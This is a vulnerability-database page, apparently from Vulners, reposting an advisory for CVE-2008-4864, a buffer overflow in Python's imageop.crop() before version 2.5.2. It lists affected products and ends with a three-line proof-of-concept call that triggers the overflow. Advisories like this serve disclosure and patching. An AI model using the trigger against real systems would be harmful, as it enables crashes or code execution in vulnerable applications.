Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Python < 2.5.2 Imageop Module 'imageop.crop()' Buffer Overflow Vulnerability

🗓️ 24 Nov 2009 00:00:00Reported by RootType 
seebug
 seebug🔗 www.seebug.org👁 34 Views

Python Imageop Buffer Overflow Vulnerabilit

Related
Code
ReporterTitlePublishedViews
Family
0day.today		Python < 2.5.2 Imageop Module 'imageop.crop()' BOF Vulnerability
24 Nov 200900:00
zdt
Tenable Nessus		CentOS 5 : python (CESA-2009:1176)
6 Jan 201000:00
nessus
Tenable Nessus		CentOS 3 : python (CESA-2009:1178)
28 Jul 200900:00
nessus
Tenable Nessus		Mac OS X Multiple Vulnerabilities (Security Update 2009-001)
13 Feb 200900:00
nessus
Tenable Nessus		Mandriva Linux Security Advisory : python (MDVSA-2009:003)
23 Apr 200900:00
nessus
Tenable Nessus		MiracleLinux 3 : python-2.4.3-24.6.1AXS3 (AXSA:2009-367:02)
14 Jan 202600:00
nessus
Tenable Nessus		Oracle Linux 5 : python (ELSA-2009-1176)
12 Jul 201300:00
nessus
Tenable Nessus		Oracle Linux 4 : python (ELSA-2009-1177)
12 Jul 201300:00
nessus
Tenable Nessus		Oracle Linux 3 : python (ELSA-2009-1178)
12 Jul 201300:00
nessus
Tenable Nessus		RHEL 5 : python (RHSA-2009:1176)
28 Jul 200900:00
nessus
Rows per page

                                                Python's 'imageop' module is prone to a buffer-overflow vulnerability.

Successful exploits may allow attackers to execute arbitrary code in the context of applications using the vulnerable Python module. This may result in a compromise of the underlying system. Failed attempts may lead to a denial-of-service condition.

This issue affects versions prior to Python 2.5.2. 

Bugtraq ID:  	 31976
Class: 	Boundary Condition Error
CVE: 	CVE-2008-4864
Published: 	Oct 29 2008 12:00AM
Updated: 	Nov 24 2009 07:56PM
Credit: 	Chris Evans
Vulnerable: 	VMWare vMA 4.0
VMWare ESX Server 3.0.3
VMWare ESX Server 2.5.5
VMWare ESX Server 4.0
VMWare ESX Server 3.5
Ubuntu Ubuntu Linux 8.10 sparc
Ubuntu Ubuntu Linux 8.10 powerpc
Ubuntu Ubuntu Linux 8.10 lpia
Ubuntu Ubuntu Linux 8.10 i386
Ubuntu Ubuntu Linux 8.10 amd64
Ubuntu Ubuntu Linux 8.04 LTS sparc
Ubuntu Ubuntu Linux 8.04 LTS powerpc
Ubuntu Ubuntu Linux 8.04 LTS lpia
Ubuntu Ubuntu Linux 8.04 LTS i386
Ubuntu Ubuntu Linux 8.04 LTS amd64
Ubuntu Ubuntu Linux 6.06 LTS sparc
Ubuntu Ubuntu Linux 6.06 LTS powerpc
Ubuntu Ubuntu Linux 6.06 LTS i386
Ubuntu Ubuntu Linux 6.06 LTS amd64
S.u.S.E. SUSE Linux Enterprise Server 10 SP2
S.u.S.E. SUSE Linux Enterprise Desktop 10 SP2
S.u.S.E. SLE SDK 10 SP2
S.u.S.E. openSUSE 11.1
S.u.S.E. openSUSE 11.0
S.u.S.E. openSUSE 10.3
S.u.S.E. Open-Enterprise-Server 0
S.u.S.E. Novell Linux POS 9
S.u.S.E. Novell Linux Desktop 9
RedHat Enterprise Linux WS 4
RedHat Enterprise Linux WS 3
RedHat Enterprise Linux ES 4
RedHat Enterprise Linux ES 3
RedHat Enterprise Linux Desktop Workstation 5 client
RedHat Enterprise Linux Desktop 5 client
RedHat Enterprise Linux AS 4
RedHat Enterprise Linux AS 3
RedHat Enterprise Linux Desktop version 4
RedHat Enterprise Linux 5 server
RedHat Desktop 3.0
Python Software Foundation Python 2.5.1
Python Software Foundation Python 2.4.5
Python Software Foundation Python 2.4.4 r14
Python Software Foundation Python 2.4.4
Python Software Foundation Python 2.4.3
+ Trustix Secure Linux 3.0.5
Python Software Foundation Python 2.4.2
Python Software Foundation Python 2.4.1
Python Software Foundation Python 2.4
Python Software Foundation Python 2.3.6
Python Software Foundation Python 2.3.5
Python Software Foundation Python 2.3.4
Python Software Foundation Python 2.3.3
Python Software Foundation Python 2.3.2
Python Software Foundation Python 2.3.1
Python Software Foundation Python 2.3 b1
Python Software Foundation Python 2.3
Python Software Foundation Python 2.2.3
+ RedHat Desktop 3.0
+ RedHat Enterprise Linux AS 3
+ RedHat Enterprise Linux ES 3
+ RedHat Enterprise Linux WS 3
+ Ubuntu Ubuntu Linux 4.1 ppc
+ Ubuntu Ubuntu Linux 4.1 ia64
+ Ubuntu Ubuntu Linux 4.1 ia32
Python Software Foundation Python 2.2.2
+ OpenPKG OpenPKG 1.2
+ RedHat Linux 7.3
+ S.u.S.E. Linux Personal 8.2
Python Software Foundation Python 2.2.1
Python Software Foundation Python 2.2
+ Conectiva Linux 8.0
+ MandrakeSoft Linux Mandrake 8.2 ppc
+ MandrakeSoft Linux Mandrake 8.2
+ MandrakeSoft Linux Mandrake 8.1 ia64
+ MandrakeSoft Linux Mandrake 8.1
Python Software Foundation Python 2.1.3
+ Debian Linux 3.0
Python Software Foundation Python 2.1.2
Python Software Foundation Python 2.1.1
Python Software Foundation Python 2.1
Python Software Foundation Python 2.0.1
Python Software Foundation Python 2.0
+ MandrakeSoft Linux Mandrake 8.0 ppc
+ MandrakeSoft Linux Mandrake 8.0
Python Software Foundation Python 1.6.1
Python Software Foundation Python 1.6
Python Software Foundation Python 1.5.2
Python Software Foundation Python 2.5
MandrakeSoft Multi Network Firewall 2.0
MandrakeSoft Linux Mandrake 2009.0 x86_64
MandrakeSoft Linux Mandrake 2009.0
MandrakeSoft Linux Mandrake 2008.1 x86_64
MandrakeSoft Linux Mandrake 2008.1
MandrakeSoft Linux Mandrake 2008.0 x86_64
MandrakeSoft Linux Mandrake 2008.0
MandrakeSoft Corporate Server 4.0 x86_64
MandrakeSoft Corporate Server 3.0 x86_64
MandrakeSoft Corporate Server 3.0
MandrakeSoft Corporate Server 4.0
Apple Mac OS X Server 10.5.6
Apple Mac OS X Server 10.5.5
Apple Mac OS X Server 10.5.4
Apple Mac OS X Server 10.5.3
Apple Mac OS X Server 10.5.2
Apple Mac OS X Server 10.5.1
Apple Mac OS X Server 10.4.11
Apple Mac OS X Server 10.4.11
Apple Mac OS X Server 10.4.10
Apple Mac OS X Server 10.4.9
Apple Mac OS X Server 10.4.8
Apple Mac OS X Server 10.4.7
Apple Mac OS X Server 10.4.6
Apple Mac OS X Server 10.4.5
Apple Mac OS X Server 10.4.4
Apple Mac OS X Server 10.4.3
Apple Mac OS X Server 10.4.2
Apple Mac OS X Server 10.4.1
Apple Mac OS X Server 10.4
Apple Mac OS X Server 10.5
Apple Mac OS X 10.5.6
Apple Mac OS X 10.5.5
Apple Mac OS X 10.5.4
Apple Mac OS X 10.5.3
Apple Mac OS X 10.5.2
Apple Mac OS X 10.5.1
Apple Mac OS X 10.4.11
Apple Mac OS X 10.4.11
Apple Mac OS X 10.4.10
Apple Mac OS X 10.4.9
Apple Mac OS X 10.4.8
Apple Mac OS X 10.4.7
Apple Mac OS X 10.4.6
Apple Mac OS X 10.4.5
Apple Mac OS X 10.4.4
Apple Mac OS X 10.4.3
Apple Mac OS X 10.4.2
Apple Mac OS X 10.4.1
Apple Mac OS X 10.4
Apple Mac OS X 10.5
Not Vulnerable: 	VMWare vMA 4.0 Patch 2
Python Software Foundation Python 2.5.2 

POC:

import imageop
s = ''
imageop.crop(s, 1, 65536, 65536, 0, 0, 65536, 65536)

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
24 Nov 2009 00:00Current
EPSS0.10929
pythonimageopbuffer overflowvulnerabilitycve-2008-4864security issueexploitarbitrary codedenial of servicepython 2.5.2data breach
34